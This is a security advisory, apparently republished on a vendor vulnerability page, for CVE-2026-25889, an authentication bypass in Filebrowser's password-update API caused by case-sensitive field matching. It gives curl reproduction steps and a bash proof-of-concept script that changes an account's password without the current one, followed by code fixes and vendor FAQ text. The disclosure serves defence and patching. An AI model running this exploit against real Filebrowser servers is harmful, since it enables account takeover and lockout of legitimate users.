Summary
Security Advisory: Authentication Bypass in User Password Update
A case-sensitivity flaw in the password validation logic allows any authenticated user to change their password (or an admin to change any user's password) without providing the current password. By using Title Case field name "Password" instead of lowercase "password" in the API request, the current_password verification is completely bypassed. This enables account takeover if an attacker obtains a valid JWT token through XSS, session hijacking, or other means.
CVSS Score: 7.5 (High)
CWE: CWE-178 (Improper Handling of Case Sensitivity)
Details
The vulnerability exists in http/users.go in the userPutHandler function (lines 181-200).
Vulnerable Code
// http/users.go:181-200
if d.settings.AuthMethod == auth.MethodJSONAuth {
var sensibleFields = map[string]struct{}{
"all": {},
"username": {},
"password": {}, // lowercase
"scope": {},
"lockPassword": {},
"commands": {},
"perm": {},
}
for _, field := range req.Which {
if _, ok := sensibleFields[field]; ok { // Case-sensitive lookup
if !users.CheckPwd(req.CurrentPassword, d.user.Password) {
return http.StatusBadRequest, fberrors.ErrCurrentPasswordIncorrect
}
break
}
}
}
Root Cause
- The
sensibleFieldsmap uses lowercase keys (e.g.,"password") - The lookup
sensibleFields[field]is case-sensitive - When
req.Whichcontains"Password"(Title Case), the lookup returnsfalse - The password verification block is skipped entirely
- Later in the code (line 229), field names are converted to Title Case for processing, so
"Password"is a valid field name
Attack Flow
1. Attacker obtains victim's JWT token (via XSS, log leakage, etc.)
2. Attacker sends PUT /api/users/{id} with:
- which: ["Password"] (Title Case - bypasses validation)
- data.password: "attacker_password"
- NO current_password field required
3. Password is changed without verification
4. Victim is locked out, attacker has full access
PoC
Prerequisites
- A valid JWT token for any user account
- Target Filebrowser instance using JSON authentication (default)
Reproduction Steps
Step 1: Obtain a valid JWT token
TOKEN=$(curl -s -X POST "http://target:8080/api/login" \
-H "Content-Type: application/json" \
-d '{"username":"victim","password":"victim_password"}')
Step 2: Attempt normal password change (should fail)
curl -s -X PUT "http://target:8080/api/users/1" \
-H "X-Auth: $TOKEN" \
-H "Content-Type: application/json" \
-d '{
"what": "user",
"which": ["password"],
"data": {"id": 1, "password": "NewPassword123456"}
}'
# Response: 400 Bad Request (the current password is incorrect)
Step 3: Bypass with Title Case (succeeds without current_password)
curl -s -X PUT "http://target:8080/api/users/1" \
-H "X-Auth: $TOKEN" \
-H "Content-Type: application/json" \
-d '{
"what": "user",
"which": ["Password"],
"data": {"id": 1, "password": "HackedPassword123"}
}'
# Response: 200 OK
Step 4: Verify account takeover
# Original password no longer works
curl -s -X POST "http://target:8080/api/login" \
-d '{"username":"victim","password":"victim_password"}'
# Response: 403 Forbidden
# New password works
curl -s -X POST "http://target:8080/api/login" \
-d '{"username":"victim","password":"HackedPassword123"}'
# Response: Valid JWT token
Automated PoC Script
#!/bin/bash
# Usage: ./poc.sh <target> <username> <current_password> <new_password>
TARGET="$1"
USERNAME="$2"
CURRENT_PASS="$3"
NEW_PASS="$4"
# Login
TOKEN=$(curl -s -X POST "$TARGET/api/login" \
-H "Content-Type: application/json" \
-d "{\"username\":\"$USERNAME\",\"password\":\"$CURRENT_PASS\"}")
# Get user ID from token
USER_ID=$(echo "$TOKEN" | python3 -c "
import sys,json,base64
parts=input().split('.')
payload=json.loads(base64.b64decode(parts[1]+'=='))
print(payload['user']['id'])
")
# Exploit: Change password without current_password
curl -s -X PUT "$TARGET/api/users/$USER_ID" \
-H "X-Auth: $TOKEN" \
-H "Content-Type: application/json" \
-d "{
\"what\": \"user\",
\"which\": [\"Password\"],
\"data\": {\"id\": $USER_ID, \"password\": \"$NEW_PASS\"}
}"
echo "Password changed to: $NEW_PASS"
Who is Impacted
- All Filebrowser users using JSON authentication method (default configuration)
- Any user whose JWT token can be obtained by an attacker
- Particularly high-value targets: administrator accounts
Attack Scenarios
| Scenario | Impact |
|---|---|
| XSS + Token Theft | Complete account takeover |
| JWT in Server Logs | Mass account compromise |
| Shared Computer | Session hijacking |
| Malicious Browser Extension | Credential theft |
Security Impact
| Category | Severity |
|---|---|
| Confidentiality | High - Attacker gains full account access |
| Integrity | High - Attacker can modify all user data |
| Availability | High - Legitimate user locked out |
Scope
- The vulnerability affects password modification only
- Other sensitive fields (
Username,Scope,Perm, etc.) have additional protection viaNonModifiableFieldsForNonAdmincheck - However, for administrators, all fields can be modified using this bypass technique
Option 1: Case-insensitive field matching (Recommended)
// Convert field to lowercase before checking
for _, field := range req.Which {
if _, ok := sensibleFields[strings.ToLower(field)]; ok {
if !users.CheckPwd(req.CurrentPassword, d.user.Password) {
return http.StatusBadRequest, fberrors.ErrCurrentPasswordIncorrect
}
break
}
}
Option 2: Use Title Case in sensibleFields
var sensibleFields = map[string]struct{}{
"All": {},
"Username": {},
"Password": {}, // Title Case to match post-transformation
"Scope": {},
"LockPassword": {},
"Commands": {},
"Perm": {},
}
// Check AFTER field name transformation
for k, v := range req.Which {
v = cases.Title(language.English, cases.NoLower).String(v)
req.Which[k] = v
// Now check with Title Case
if _, ok := sensibleFields[v]; ok {
if !users.CheckPwd(req.CurrentPassword, d.user.Password) {
return http.StatusBadRequest, fberrors.ErrCurrentPasswordIncorrect
}
break
}
}
References
- Affected File:
http/users.go - Affected Lines: 181-200
- Related Code:
NonModifiableFieldsForNonAdmin(line 17)
Impact
CVE-2026-25889 has a CVSS score of 5.4 (Medium). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (2.57.1); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-25889? CVE-2026-25889 is a medium-severity security vulnerability in github.com/filebrowser/filebrowser/v2 (go), affecting versions <= 2.57.0. It is fixed in 2.57.1.
- How severe is CVE-2026-25889? CVE-2026-25889 has a CVSS score of 5.4 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of github.com/filebrowser/filebrowser/v2 are affected by CVE-2026-25889? github.com/filebrowser/filebrowser/v2 (go) versions <= 2.57.0 is affected.
- Is there a fix for CVE-2026-25889? Yes. CVE-2026-25889 is fixed in 2.57.1. Upgrade to this version or later.
- Is CVE-2026-25889 exploitable, and should I be worried? Whether CVE-2026-25889 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-25889 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-25889? Upgrade
github.com/filebrowser/filebrowser/v2to 2.57.1 or later.